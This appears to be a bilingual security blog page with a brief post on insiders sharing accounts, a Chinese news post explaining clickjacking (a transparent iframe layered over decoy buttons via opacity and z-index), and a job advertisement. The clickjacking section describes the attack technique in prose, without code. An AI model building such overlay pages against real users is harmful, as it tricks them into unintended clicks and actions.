In a recent survey by RSA, a fact was discovered that insiders dodge security for productivity. I agree that it’s very common at a company that workers and employees share a computer or share some accounts. It might be a not-bad compromise for a non-critical and non-sensitive IT environment in order to cost saving. Anyway, in most cases, it violate best practice and should be corrected.
SecurityFocus报道了一种新型的基于web的攻击方式 – clickjacking。简单说是一种通过web显示与用户实际看到的内容不一致的浏览器缺陷,来引导用户点击或者输入攻击者想要的动作或内容。像按钮、图像、表单、链接等都可能被用来实施这种攻击。通过巧妙地设计,攻击者可以通过点击劫持,可以操控被害者的摄像头和麦克风。并且根据报道,当前的集中主流的浏览器,像IE, Chrome, Safari, Opera等都不能幸免。而当前Firefox3.0上的一个插件 – NoScript可以帮助保护避免这种攻击。
发明者Hansen and Grossman给这种攻击方式取了这个名字Clickjacking – 点击劫持,也很形象,一种欺骗性的hijacking。它比简单的基于域名欺骗的网络钓鱼更有隐蔽性和欺骗性。
Google到毒霸博客上有一篇很好的报道。下面是一些摘录:
简单的说Clickjacking是一种攻击,是一种新型的WEB方式攻击。上面所涉及到的“Flash Player漏洞”,其实只是Clickjacking安全漏洞一种表现形式。
Clickjacking翻译可以将他拆成click-jacking来理解,click是点击的意思(鼠标点击),jacking应该是劫持的意思(hijacking的缩写?不得而知)。联起来翻译就是“点击劫持”。这里也涉及到了Clickjacking的说法,他们把“Clickjacking”叫做“UI redress vulnerabilities(界面伪装漏洞 )”,这个解释也许更能描述清楚这个漏洞的情况。
在一个已经公布clickjacking的Demo演示程序中我们不难发现clickjacking的内涵。
在 你可控制的页面A内有一个iframe,iframe的src链接到另一个域的页面B。设置这个iframe的CSS样式的透明度为0,并设置其 CSS样式的z-index比页面A的其他元素的z-index大。这个iframe的width与height值都设置为足以保证用户可以点击到其中内 容(页面B的内容)的大小。然后在页面A上放置一些按钮、链接等可以欺骗用户点击的元素,这些元素在iframe之下(z-index值决定),并恰好与 iframe的页面B内的关键元素在同一个位置。于是当用户被欺骗去点击页面A内的这些元素时,实际上点击了页面B内的关键元素。至于页面B内的关键元素 是什么,大家想想便知,比如:删除按钮、添加按钮、单选框、请求链接等等。再加上一些社工技巧,这类攻击方式可以进行得非常巧妙。这种攻击基于DHTML 技术,用到了iframe,而且这样的攻击方式不一定需要JS。
其实这样的欺骗很早就有了,同样这里罗列出了三种(onMouseUpJacking,FormJacking,SubmitJacking)点击劫持的方法。
如果黑客精心设计clickjacking攻击页面,网页访客进行常规的鼠标点击行为或者无意间的鼠标点击行为,都会有可能点击会激发背后的隐形身影,而这隐形身影包括下载木马或者其他等行为(打开摄像头等)。
There is a good job opportunity in our organization. If you are interested or have friends to recommend, please don’t hasitate to contact me by sending the CV/resume to my email address (richard.zhaol at gmail dot com)
Job Discription:
This is a senior technical position of Global Infrastructure Department, under CIO organizations. This is an individual contributor, direct report to Director of Architect and Security Operations.
1. Lead the global roadmap and technology innovations related to server, storage, virtualization.
2. Lead the design the overall architecture and standards for global server and storage
3. Communicate with global business users and collect, analyze their requirements
4. Design the solution to meet the business requirements, with support from SME (subject matter expert) from operation towers
5. Lead the design and define of technical manuals and templates used for operational enhancements and changes.
Requirements:
1. Bachelor degree majored in Computer Sciences or Electrical Engineering with very good academic performances (Master/PhD a plus)
2. Minimum 10 Years working experience as IT Operation/Consulting engineer/architect, minimum 5 years IT system design experience, minimum 3 years large scale server and storage system design experience
3. Strong technical background in related fields, ie. networking, telecom and security technologies (Experience at ITIL is a plus)
4. Good communication skill. Good written/spoken English, be able to give technical talks/presentation both in English.
Recent Comments